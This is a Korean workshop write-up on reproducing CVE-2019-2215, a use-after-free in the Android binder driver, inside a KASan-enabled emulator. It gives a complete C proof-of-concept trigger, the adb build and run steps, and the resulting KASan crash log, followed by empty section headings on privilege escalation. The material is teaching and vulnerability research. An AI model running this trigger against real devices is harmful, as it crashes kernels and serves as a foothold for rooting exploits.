0000000047f78877 A __crc_kasan_restore_multi_shot
0000000097645739 A __crc_kasan_save_enable_multi_shot
ffffffff806d4d62 T kasan_add_zero_shadow
ffffffff806d3a9c T kasan_alloc_pages
ffffffff806d3b44 T kasan_cache_create
ffffffff806d55b9 T kasan_cache_shrink
ffffffff806d55c4 T kasan_cache_shutdown

Boot Kernel

1
ashfaq@hacksys:~/workshop/android-4.14-dev$ emulator -show-kernel -no-snapshot -wipe-data -avd CVE-2019-2215 -kernel ~/workshop/android-4.14-dev/out/kasan/dist/bzImage
  • show-kernel flag 터미널에서 커널 디버그 메세지를 보여준다
  • other command
1
[    0.000000] kasan: KernelAddressSanitizer initialized

다음이 보이면 부트에 성공한것

Crash

PoC(proof of concept)를 일으켜보자

다음 파일을 사용할 것이다. workshop/exploit/trigger.cpp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#include <fcntl.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <stdio.h>

/* BINDER_THREAD_EXIT ioctl request code; no argument payload is used. */
#define BINDER_THREAD_EXIT 0x40046208ul

/*
 * PoC trigger for CVE-2019-2215 (use-after-free in the binder driver).
 *
 * 1. Open /dev/binder and register the fd with an epoll instance:
 *    binder_poll() allocates a binder_thread and links its embedded
 *    waitqueue into epoll (KASan "Allocated by" backtrace:
 *    SyS_epoll_ctl -> binder_poll -> binder_get_thread).
 * 2. BINDER_THREAD_EXIT frees that binder_thread while epoll still
 *    holds a pointer to its waitqueue (KASan "Freed by" backtrace:
 *    binder_ioctl -> binder_thread_release).
 * 3. On process exit, ep_free() walks the stale waitqueue pointer and
 *    KASan reports the use-after-free in remove_wait_queue().
 *
 * Returns 0 when every step was issued (the crash shows up in the
 * kernel log), 1 if any setup syscall fails. The original version
 * checked no return values, so e.g. a missing /dev/binder made the
 * PoC silently do nothing.
 */
int main() {
    int fd, epfd;
    struct epoll_event event = {.events = EPOLLIN};

    fd = open("/dev/binder", O_RDONLY);
    if (fd < 0) {
        perror("open(/dev/binder)");
        return 1;
    }

    epfd = epoll_create(1000);
    if (epfd < 0) {
        perror("epoll_create");
        return 1;
    }

    if (epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event) < 0) {
        perror("epoll_ctl(EPOLL_CTL_ADD)");
        return 1;
    }

    if (ioctl(fd, BINDER_THREAD_EXIT, NULL) < 0) {
        perror("ioctl(BINDER_THREAD_EXIT)");
        return 1;
    }

    return 0;
}
1
2
3
4
5
6
7
8
9
10
11
ashfaq@hacksys:~/workshop$ cd exploit/
ashfaq@hacksys:~/workshop/exploit$ NDK_ROOT=~/Android/Sdk/ndk/21.0.6113669 make build-trigger push-trigger
Building: cve-2019-2215-trigger
Pushing: cve-2019-2215-trigger to /data/local/tmp
cve-2019-2215-trigger: 1 file pushed, 0 skipped. 44.8 MB/s (3958288 bytes in 0.084s)
ashfaq@hacksys:~/workshop/exploit$ adb shell
generic_x86_64:/ $ uname -a
Linux localhost 4.14.150+ #1 repo:q-goldfish-android-goldfish-4.14-dev SMP PREEMPT Sat Apr x86_64
generic_x86_64:/ $ cd /data/local/tmp
generic_x86_64:/data/local/tmp $ ./cve-2019-2215-trigger
generic_x86_64:/data/local/tmp $
  • make
  • adb
    • uname -a : 리눅스 내부 버전 확인

에뮬레이터를 띄운 터미널을 보면 카산에서 crash log를 띄운것을 볼 수 있다.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
[  382.398561] ==================================================================
[  382.402796] BUG: KASAN: use-after-free in _raw_spin_lock_irqsave+0x3a/0x5d
[  382.405929] Write of size 4 at addr ffff88804e4865c8 by task cve-2019-2215-t/7682
[  382.409386] 
[  382.410127] CPU: 1 PID: 7682 Comm: cve-2019-2215-t Tainted: G        W       4.14.150+ #1
[  382.413871] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.11.1-0-g0551a4be2c-prebuilt.qemu-project.org 04/01/2014
[  382.417931] Call Trace:
[  382.419106]  dump_stack+0x78/0xbe
[  382.420596]  print_address_description+0x81/0x25d
[  382.422146]  ? _raw_spin_lock_irqsave+0x3a/0x5d
[  382.423691]  __kasan_report+0x14f/0x180
[  382.425082]  ? _raw_spin_lock_irqsave+0x3a/0x5d
[  382.426437]  kasan_report+0x26/0x49
[  382.427468]  check_memory_region+0x171/0x17e
[  382.428725]  kasan_check_write+0x14/0x16
[  382.429884]  _raw_spin_lock_irqsave+0x3a/0x5d
[  382.431010]  remove_wait_queue+0x27/0x122
[  382.432003]  ? fsnotify_unmount_inodes+0x1e8/0x1e8
[  382.433156]  ep_unregister_pollwait+0x160/0x1bd
[  382.434252]  ep_free+0x8b/0x181
[  382.435024]  ? ep_eventpoll_poll+0x228/0x228
[  382.435953]  ep_eventpoll_release+0x48/0x54
[  382.436825]  __fput+0x1f2/0x51d
[  382.437483]  ____fput+0x15/0x18
[  382.438145]  task_work_run+0x127/0x154
[  382.438932]  do_exit+0x818/0x2384
[  382.439642]  ? mm_update_next_owner+0x52f/0x52f
[  382.440555]  do_group_exit+0x12c/0x24b
[  382.441247]  ? do_group_exit+0x24b/0x24b
[  382.441964]  SYSC_exit_group+0x17/0x17
[  382.442652]  SyS_exit_group+0x14/0x14
[  382.443264]  do_syscall_64+0x19e/0x225
[  382.443920]  entry_SYSCALL_64_after_hwframe+0x3d/0xa2
[  382.444784] RIP: 0033:0x4047d7
[  382.445341] RSP: 002b:00007ffe9760fe18 EFLAGS: 00000246 ORIG_RAX: 00000000000000e7
[  382.446661] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00000000004047d7
[  382.447904] RDX: 0000000000000002 RSI: 0000000000001000 RDI: 0000000000000000
[  382.449190] RBP: 0000000000000000 R08: 0000000000482335 R09: 0000000000000000
[  382.450517] R10: 00007ffe9760fe10 R11: 0000000000000246 R12: 0000000000400190
[  382.451889] R13: 00000000004a4618 R14: 00000000004002e0 R15: 00007ffe9760fee0
[  382.453146] 
[  382.453427] Allocated by task 7682:
[  382.454054]  save_stack_trace+0x16/0x18
[  382.454738]  __kasan_kmalloc+0x133/0x1cc
[  382.455445]  kasan_kmalloc+0x9/0xb
[  382.456063]  kmem_cache_alloc_trace+0x1bd/0x26f
[  382.456869]  binder_get_thread+0x166/0x6db
[  382.457605]  binder_poll+0x4c/0x1c2
[  382.458235]  SyS_epoll_ctl+0x1558/0x24f0
[  382.458910]  do_syscall_64+0x19e/0x225
[  382.459598]  entry_SYSCALL_64_after_hwframe+0x3d/0xa2
[  382.460525]  0xffffffffffffffff
[  382.461085] 
[  382.461334] Freed by task 7682:
[  382.461762]  save_stack_trace+0x16/0x18
[  382.462222]  __kasan_slab_free+0x18f/0x23f
[  382.462711]  kasan_slab_free+0xe/0x10
[  382.463149]  kfree+0x193/0x5b3
[  382.463538]  binder_thread_dec_tmpref+0x192/0x1d9
[  382.464095]  binder_thread_release+0x464/0x4bd
[  382.464623]  binder_ioctl+0x48a/0x101c
[  382.465071]  do_vfs_ioctl+0x608/0x106a
[  382.465518]  SyS_ioctl+0x75/0xa4
[  382.465906]  do_syscall_64+0x19e/0x225
[  382.466358]  entry_SYSCALL_64_after_hwframe+0x3d/0xa2
[  382.466953]  0xffffffffffffffff
[  382.467335] 
[  382.467783] The buggy address belongs to the object at ffff88804e486528
[  382.467783]  which belongs to the cache kmalloc-512 of size 512
[  382.469983] The buggy address is located 160 bytes inside of
[  382.469983]  512-byte region [ffff88804e486528, ffff88804e486728)
[  382.472065] The buggy address belongs to the page:
[  382.472915] page:ffffea0001392100 count:1 mapcount:0 mapping:          (null) index:0xffff88804e4872a8 compound_mapcount: 0
[  382.474871] flags: 0x4000000000010200(slab|head)
[  382.475744] raw: 4000000000010200 0000000000000000 ffff88804e4872a8 000000010012000e
[  382.476960] raw: ffffea00015fb220 ffff88805ac01650 ffff88805ac0cf40 0000000000000000
[  382.478072] page dumped because: kasan: bad access detected
[  382.478784] 
[  382.478973] Memory state around the buggy address:
[  382.479571]  ffff88804e486480: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[  382.480479]  ffff88804e486500: fc fc fc fc fc fb fb fb fb fb fb fb fb fb fb fb
[  382.481318] >ffff88804e486580: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[  382.482155]                                               ^
[  382.482806]  ffff88804e486600: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[  382.483648]  ffff88804e486680: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[  382.484485] ==================================================================
  • Use after Free
  • kmalloc-512 캐시에 존재하는 dangling pointer(free 후 해제된 메모리를 가리키는 포인터)가 원인이다.

KASan Symbolizer

Scripted Privilege Escalation

실제 privilege escalation을 하는것에 대한 실습

Kernel Debugging

Root Cause Analysis

Posted 2020-06-19